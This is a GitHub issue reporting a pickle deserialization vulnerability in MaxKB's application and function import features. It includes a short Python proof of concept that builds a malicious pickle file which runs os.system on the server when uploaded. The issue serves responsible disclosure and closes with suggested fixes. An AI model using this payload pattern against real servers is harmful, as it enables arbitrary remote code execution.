Skip to content

[Bug] The import function may have deserialization vulnerabilities #2574

New issue
New issue
Closed
Closed
[Bug] The import function may have deserialization vulnerabilities#2574
Assignees
zyyfit
@muyulong

Description

@muyulong
muyulong
opened on Mar 17, 2025

Contact Information

No response

MaxKB Version

v1.10.2-lts (build at 2025-03-05T19:39, commit: bc3dcda)

Problem Description

描述:

导入应用功能和导入函数功能,使用 Python 的 pickle.loads() 直接反序列化用户上传的文件,这存在严重的安全漏洞,因为 pickle 反序列化可以执行任意代码。攻击者可以通过构造恶意的 pickle 文件在服务器上执行任意代码。

影响范围:

apps/application/serializers/application_serializers.py
apps/function_lib/serializers/function_lib_serializer.py

Steps to Reproduce

验证

import pickle
import os


class Evil:
    def __reduce__(self):
        return (os.system, ('echo "Whoops,you have been hacked!" > /tmp/hacked.txt',))


evil_data = pickle.dumps(Evil())


with open("evil_data.mk", "wb") as f:
    f.write(evil_data)

# 通过页面或者api上传该文件,可以在服务器上执行任意命令。

The expected correct result

1.建议停止使用 pickle.loads() 处理用户上传的数据
2.使用其他安全的序列化格式
3.添加数据验证和文件内容验证

Related log output



Additional Information


No response
Metadata
Metadata
Assignees
Labels
No labels
No labels
Type
No type
Projects
No projects
Milestone
No milestone
Relationships
None yet
Development
No branches or pull requests
Issue actions